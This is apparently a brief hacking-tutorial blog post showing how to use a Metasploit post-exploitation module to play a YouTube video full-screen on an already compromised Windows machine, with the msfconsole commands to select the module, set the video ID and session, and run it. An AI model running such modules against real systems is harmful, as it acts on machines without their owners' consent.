This module will broadcast a Youtube video on all compromised systems. It will play the video in the target machine’s native browser in full screen mode. The VID datastore option is the “v” parameter in your Youtube video’s URL
Exploit Targets
Windows 7
Windows XP
Windows 8
Requirement
Attacker: Kali Linux
Victim PC: Window7
First Hack the Victim PC Using Metaspolit (Tutorial How to Hack Remote PC)
Open Kali Linux terminal type msfconsole
Now type use post/multi/manage/play_youtube
msf exploit (play_youtube)>set VID (Youtube Video ID)
msf exploit (play_youtube)>set session 1
msf exploit (play_youtube)>exploit
You can get the Video ID from Video URL as selected below
The post How to Broadcast YouTube Video in Remote Windows,Linux or MAC System appeared first on Hacking Articles.